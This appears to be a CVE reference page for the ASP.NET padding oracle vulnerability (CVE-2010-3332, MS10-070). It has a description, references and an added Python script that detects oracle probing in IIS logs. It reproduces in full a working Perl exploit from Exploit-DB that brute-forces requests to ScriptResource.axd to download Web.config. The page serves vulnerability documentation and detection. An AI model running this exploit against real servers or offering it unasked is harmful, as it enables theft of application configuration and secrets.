CVE-2010-3332
Description
Microsoft .NET Framework 1.1 SP1, 2.0 SP1 and SP2, 3.5, 3.5 SP1, 3.5.1, and 4.0, as used for ASP.NET in Microsoft Internet Information Services (IIS), provides detailed error codes during decryption attempts, which allows remote attackers to decrypt and modify encrypted View State (aka __VIEWSTATE) form data, and possibly forge cookies or read application files, via a padding oracle attack, aka "ASP.NET Padding Oracle Vulnerability."
Mitigations
No mitigations published for this CVE yet.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
Microsoft ASP.NET - Padding Oracle (MS10-070)
```perl
# Source: http://blog.mindedsecurity.com/2010/10/breaking-net-encryption-with-or-without.html
#!/usr/bin/perl
#
#
# Webconfig Bruter - exploit tool for downloading Web.config
#
# To use this script you need Padbuster.
# Padbuster is a great tool and Brian Holyfield deserves all the credit.
# Note from Exploit-db: This very first exploit was meant to work with Padbusterdotnet or Padbuster v0.2.
# A similar exploitation vector was also added lately in Padbuster v0.3:
# http://www.gdssecurity.com/l/b/2010/10/04/padbuster-v0-3-and-the-net-padding-oracle-attack/
# https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/15213.pl (padBuster.pl)
#
#
# Giorgio Fedon - (giorgio.fedon@mindedsecurity.com)
#
use LWP::UserAgent;
use strict;
use Getopt::Std;
use MIME::Base64;
use URI::Escape;
use Getopt::Long;
#Definition of vars for .NET
my $toEncodeDecode;
my $b64Encoded;
my $string;
my $returnVal;
my $testUrl;
my $testBytes;
my $sampleBytes;
my $testUrl = @ARGV[0]."\?d\=";
my $sampleBytes = @ARGV[1];
my $blockSize = @ARGV[2];
if ($#ARGV < 2) {
    die "
Use: Web.config_bruter.pl ScriptResourceUrl Encrypted_Sample BlockSize
Where: URL = The target URL (and query string if applicable)
EncryptedSample = The encrypted value you want to use.
This need to come from Padbuster.
BlockSize = The block size being used by the algorithm (8 or 16)
Poc code by giorgio.fedon\@mindedsecurity.com
Original Padbuster code from Brian Holyfield - Gotham Digital Science
Command Example:
./Web.config_bruter.pl https://127.0.0.1:8083/ScriptResource.axd d1ARvno0iSA6Ez7Z0GEAmAy3BpX8a2 16
";}
my $method = "GET";
$sampleBytes = encoder($sampleBytes, 1);
my $testBytes = "\x00" x $blockSize;
my $counter = 0;
# Use random bytes
my @nums = (0..255);
my $status = 1;
while ($status)
{
    # Fuzz the test bytes
    for (my $byteNum = $blockSize - 1; $byteNum >= 0; $byteNum--)
    {
        substr($testBytes, $byteNum, 1, chr($nums[rand(@nums)]));
    }
    # Combine the test bytes and the sample
    my $combinedTestBytes = encoder($testBytes.$sampleBytes, 0);
    chomp($combinedTestBytes);
    $combinedTestBytes =~ s/\%0A//g;
    # Ok, now make the request
    my ($status, $content, $location, $contentLength) = makeRequest($method, $testUrl.$combinedTestBytes);
    if ($status == "200")
    {
        # Remove this for "T" exploit
        if (index($content,"parent\.Sys\.Application") == -1)
        {
            print $content."\n\n";
            print "Total Requests:".$counter."\n\n";
            print "Resulting Exploit Block:".$combinedTestBytes."\n\n";
            last;
        }
    }
    $counter++;
}
# The following code is taken from PadBuster. Credit: Brian Holyfield - Gotham Digital Science
#
# I also did the encoder / decoder, but your logic is definitely better
sub encoder
{
    my ($toEncodeDecode, $oper) = @_;
    # UrlDecoder Encoder
    if ($oper == 1)
    {
        $toEncodeDecode =~ s/\-/\+/g;
        $toEncodeDecode =~ s/\_/\//g;
        my $count = chop($toEncodeDecode);
        $toEncodeDecode = $toEncodeDecode.("=" x int($count));
        $returnVal = decode_base64($toEncodeDecode);
    }
    else
    {
        $b64Encoded = encode_base64($toEncodeDecode);
        $b64Encoded =~ s/(\r|\n)//g;
        $b64Encoded =~ s/\+/\-/g;
        $b64Encoded =~ s/\//\_/g;
        my $count = $b64Encoded =~ s/\=//g;
        ($count eq "") ? ($count = 0) : "";
        $returnVal = $b64Encoded.$count;
    }
    return $returnVal;
}
sub makeRequest {
    my ($method, $url) = @_;
    my ($lwp, $status, $content, $req, $location, $contentLength);
    # Setup LWP UserAgent
    $lwp = LWP::UserAgent->new(env_proxy => 1,
                               keep_alive => 1,
                               timeout => 30,
                               requests_redirectable => [],
                               );
    $req = new HTTP::Request $method => $url;
    my $response = $lwp->request($req);
    # Extract the required attributes from the response
    $status = substr($response->status_line, 0, 3);
    $content = $response->content;
    #print $content;
    $location = $response->header("Location");
    if ($location eq "")
    {
        $location = "N/A";
    }
    $contentLength = $response->header("Content-Length");
    return ($status, $content, $location, $contentLength);
}
```
Microsoft ASP.NET - Auto-Decryptor File Download (MS10-070)
Microsoft ASP.NET - Padding Oracle File Download (MS10-070)
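An added detection example, not part of the original page or the PoC: the request loop in the PoC above sends a fresh random `d` value to `ScriptResource.axd` on every attempt, so a single client requesting many distinct `d` tokens with mostly error responses stands out in IIS logs. The log lines are constructed, and the thresholds and the inclusion of `WebResource.axd` are assumptions.

```python
from collections import defaultdict
from urllib.parse import parse_qs

# ASP.NET resource handlers that take an encrypted "d" parameter.
# ScriptResource.axd is the one on this page; WebResource.axd is an added assumption.
HANDLERS = ("/scriptresource.axd", "/webresource.axd")

def build_sample_log():
    """Constructed IIS W3C extended log lines (not real traffic)."""
    lines = ["#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status"]
    # Ordinary page loads: the same two tokens repeated, all 200.
    for i in range(6):
        lines.append(f"2010-10-05 10:00:{i:02d} GET /ScriptResource.axd "
                     f"d=tokA{i % 2}&t=1 10.0.0.5 200")
    # Probing pattern: a new d value on every request, almost all errors.
    for i in range(40):
        status = 200 if i == 39 else (500 if i % 3 else 404)
        lines.append(f"2010-10-05 10:01:{i:02d} GET /ScriptResource.axd "
                     f"d=probe{i:04d} 10.0.0.66 {status}")
    return lines

def find_oracle_probing(lines, min_distinct=25, min_error_ratio=0.8):
    """Return {client_ip: (distinct_d_values, error_ratio)} for suspicious clients."""
    fields = []
    stats = defaultdict(lambda: {"tokens": set(), "total": 0, "errors": 0})
    for line in lines:
        if line.startswith("#Fields:"):
            fields = line.split()[1:]      # column names for the rows that follow
            continue
        if line.startswith("#") or not fields:
            continue
        row = dict(zip(fields, line.split()))
        if not row.get("cs-uri-stem", "").lower().endswith(HANDLERS):
            continue
        d = parse_qs(row.get("cs-uri-query", "")).get("d")
        if not d:
            continue
        s = stats[row["c-ip"]]
        s["tokens"].add(d[0])
        s["total"] += 1
        s["errors"] += row["sc-status"][0] in "45"   # 4xx/5xx responses
    return {ip: (len(s["tokens"]), s["errors"] / s["total"])
            for ip, s in stats.items()
            if len(s["tokens"]) >= min_distinct
            and s["errors"] / s["total"] >= min_error_ratio}

if __name__ == "__main__":
    for ip, (n, ratio) in find_oracle_probing(build_sample_log()).items():
        print(f"{ip}: {n} distinct d values, {ratio:.0%} errors")
```

Where error responses are made uniform, the error ratio stops being informative and the distinct-token count per client is the signal to keep.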
Application impact
| Vendor | Product | Versions | Fixed |
|---|---|---|---|
| microsoft | .net_framework | 1.1 | |
| microsoft | .net_framework | 2.0 | |
| microsoft | .net_framework | 3.5 | |
| microsoft | .net_framework | 3.5.1 | |
| microsoft | .net_framework | 4.0 | |
| microsoft | internet_information_services | - | |
References
- http://blogs.technet.com/b/srd/archive/2010/09/17/understanding-the-asp-net-vulnerability.aspx
- http://isc.sans.edu/diary.html?storyid=9568
- http://pentonizer.com/general-programming/aspnet-poet-vulnerability-what-else-can-i-do/
- http://secunia.com/advisories/41409
- http://securitytracker.com/id?1024459
- http://threatpost.com/en_us/blogs/new-crypto-attack-affects-millions-aspnet-apps-091310
- http://twitter.com/thaidn/statuses/24832350146
- http://weblogs.asp.net/scottgu/archive/2010/09/18/important-asp-net-security-vulnerability.aspx
- http://www.dotnetnuke.com/Community/Blogs/tabid/825/EntryId/2799/Oracle-Padding-Vulnerability-in-ASP-NET.aspx
- http://www.ekoparty.org/juliano-rizzo-2010.php
- http://www.microsoft.com/technet/security/advisory/2416728.mspx
- http://www.mono-project.com/Vulnerabilities#ASP.NET_Padding_Oracle
- http://www.securityfocus.com/bid/43316
- http://www.theinquirer.net/inquirer/news/1732956/security-researchers-destroy-microsoft-aspnet-security
- http://www.troyhunt.com/2010/09/fear-uncertainty-and-and-padding-oracle.html
- http://www.vupen.com/english/advisories/2010/2429
- http://www.vupen.com/english/advisories/2010/2751
- https://docs.microsoft.com/en-us/security-updates/securitybulletins/2010/ms10-070
- https://exchange.xforce.ibmcloud.com/vulnerabilities/61898
- https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A12365
CWEs
CWE-209